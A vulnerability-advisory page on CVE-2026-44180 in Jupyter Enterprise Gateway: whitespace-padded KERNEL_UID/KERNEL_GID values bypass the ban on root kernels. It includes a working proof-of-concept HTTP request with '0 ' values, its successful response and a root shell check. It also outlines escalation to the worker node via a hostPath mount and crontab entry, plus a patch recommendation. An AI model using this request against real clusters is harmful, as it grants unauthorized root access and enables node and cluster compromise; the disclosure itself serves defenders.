Skip to main content

Jupyter Enterprise Gateway CVE-2026-44180

CRITICAL
Improper Input Validation (CWE-20)
2026-06-03 https://github.com/jupyter-server/enterprise_gateway GHSA-chq7-94j8-cj28
Kubernetes RCE
9.8
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 03, 2026 - 21:45 vuln.today
Analysis Generated
Jun 03, 2026 - 21:45 vuln.today
CVE Published
Jun 03, 2026 - 21:30 nvd
CRITICAL 9.8

DescriptionNVD

Summary

Jupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root). This can be bypassed. It is possible to launch kernels with a prohibited UID and/or GID by using a specially crafted KERNEL_UID or KERNEL_GID value.

The feature is described in the documentation:

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L103-L107

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L88-L92

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/deploy-kubernetes.md?plain=1#L769

Details

The prohibited_uids and prohibited_uids are set based of the OS env var EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS, and default to the string 0.

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L29-L30

The checks https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L113 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L119 look for the user supplied KERNEL_UID / KERNEL_GID string in the prohibited_uids / prohibited_gids strings. These checks can be bypassed by including whitespace, for example the string 0 (trailing space).

The user supplied string is used in the Kubernetes manifest at https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L35 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L38 where they are parsed as an integer in the Jinja2 template - which will ignore the whitespace.

PoC

How it is meant to work

Trying 0 gets denied, as expected.

bash
xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0", "KERNEL_GID": "0"}'
HTTP/1.1 403 Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!
Content-Length: 94
Content-Type: application/json
Date: Mon, 14 Jul 2025 12:57:09 GMT
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff
json
{
    "reason": "Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!",
    "message": ""
}
Exploit bypassing the checks

Using 0 with a trailing space, bypasses the check.

bash
xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0 ", "KERNEL_GID": "0 "}'
HTTP/1.1 201 Created
Content-Length: 172
Content-Type: application/json
Date: Mon, 14 Jul 2025 14:15:19 GMT
Location: /api/kernels/17eee032-994f-4dd2-8ade-87169c300a40
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff
{
    "id": "17eee032-994f-4dd2-8ade-87169c300a40",
    "name": "python_kubernetes",
    "last_activity": "2025-07-14T14:15:21.468155Z",
    "execution_state": "starting",
    "connections": 0
}

The pod is successfully scheduled.

Inspecting the container we can see it is running as root:

bash
kubectl exec -it pod/bdawg -- bash
(base) root@bdawg3:~
# id
uid=0(root) gid=0(root) groups=0(root),100(users)

If we had not supplied the KERNEL_UID / KERNEL_GID the container would have been running as UID:GID 1000:100 (jovyan:users).

Impact

This input validation vulnerability allows running Jupyter kernels as root, which can be dangerous as it allows more attack surface, and may lead to container escapes, compromising the worker node and all workloads running on it. Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. It is possible to specify volume mounts, so one vector for a container escape is to use a hostPath R/W volume mount, use this UID/GID bypass to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.

Organisations running Jupyter Enterprise Gateway to host Jupyter Kernels on at least Kubernetes clusters (I've tested this), and possibly on any other supported container orchestration systems or systems that utilise the KERNEL_UID and KERNEL_GID variables with the EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS feature.

AnalysisAI

Privilege bypass in Jupyter Enterprise Gateway versions 2.0.0rc1 through 3.2.x allows remote unauthenticated attackers to launch Jupyter kernels as root (UID/GID 0) by appending whitespace to the KERNEL_UID or KERNEL_GID values, bypassing the EG_PROHIBITED_UIDS/GIDS protection. The flaw chains with Kubernetes hostPath volume mounts to enable container escape and worker-node compromise, with publicly available exploit code (PoC) documented in the GHSA advisory; no public exploitation identified at time of analysis.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Reach gateway API over network
Delivery
POST /api/kernels with KERNEL_UID='0 '
Exploit
Bypass _enforce_prohibited_ids whitespace check
Install
Jinja2 renders runAsUser=0 in pod manifest
C2
Kernel pod scheduled as root with hostPath mount
Execute
Write crontab to host filesystem
Impact
Code execution on Kubernetes worker node
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Requires network reachability to the Jupyter Enterprise Gateway REST API (/api/kernels) on a deployment running an affected version (>= 2.0.0rc1, < 3.3.0) that uses the KERNEL_UID/KERNEL_GID environment-variable mechanism with the EG_PROHIBITED_UIDS/EG_PROHIBITED_GIDS feature - confirmed against Kubernetes backends and probable for other container orchestrators sharing this code path. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) reflects network-reachable, unauthenticated exploitation with high impact on confidentiality, integrity, and availability - consistent with the PoC showing a single HTTP POST to /api/kernels yielding a root-running pod. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with network reachability to the Enterprise Gateway API sends an HTTP POST to /api/kernels with env values KERNEL_UID and KERNEL_GID set to '0 ' (trailing space), which slips past the prohibited-ID string check but is rendered as integer 0 in the Kubernetes pod manifest. The scheduled kernel pod runs as root; the attacker then specifies a hostPath read-write KERNEL_VOLUME_MOUNT, writes a crontab entry to the underlying node filesystem, and gains code execution on the worker node, pivoting toward full cluster compromise. …
Remediation Vendor-released patch: upgrade jupyter_enterprise_gateway to 3.3.0 or later, which adds stricter UID/GID validation in ContainerProcessProxy._enforce_prohibited_ids per the release notes at https://github.com/jupyter-server/enterprise_gateway/releases/tag/v3.3.0; note that 3.3.0 also drops Python 3.8/3.9, so plan a Python runtime bump if you are on those versions. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Inventory all Jupyter Enterprise Gateway deployments by version; isolate instances from untrusted networks and restrict access to authenticated internal users only. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-46389 CRITICAL
10.0 Jun 05

Authentication bypass in Defense Unicorns UDS Identity Config versions 0.11.0 through 0.26.0 allows unauthenticated remo
CVE-2026-32193 HIGH
8.8 Jun 09

Local privilege escalation and code execution in Microsoft Azure Kubernetes Service (AKS) is possible via a path travers
CVE-2026-53474 CRITICAL
9.6 Jun 10

SQL injection in Red Hat's kubev2v migration-planner allows a remote authenticated attacker to upload a crafted RVTools

CVE-2026-45730 HIGH
8.3 Jun 04

{id}) or delete (DELETE /api/projects) any project on the platform, triggering cascading deletion of associated Function
CVE-2026-45726 HIGH
7.6 Jun 05

Sensitive credential disclosure in Sidero Labs Omni (versions 1.3.0–1.6.5 and 1.7.0–1.7.2) allows authenticated users wi

Share

CVE-2026-44180 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy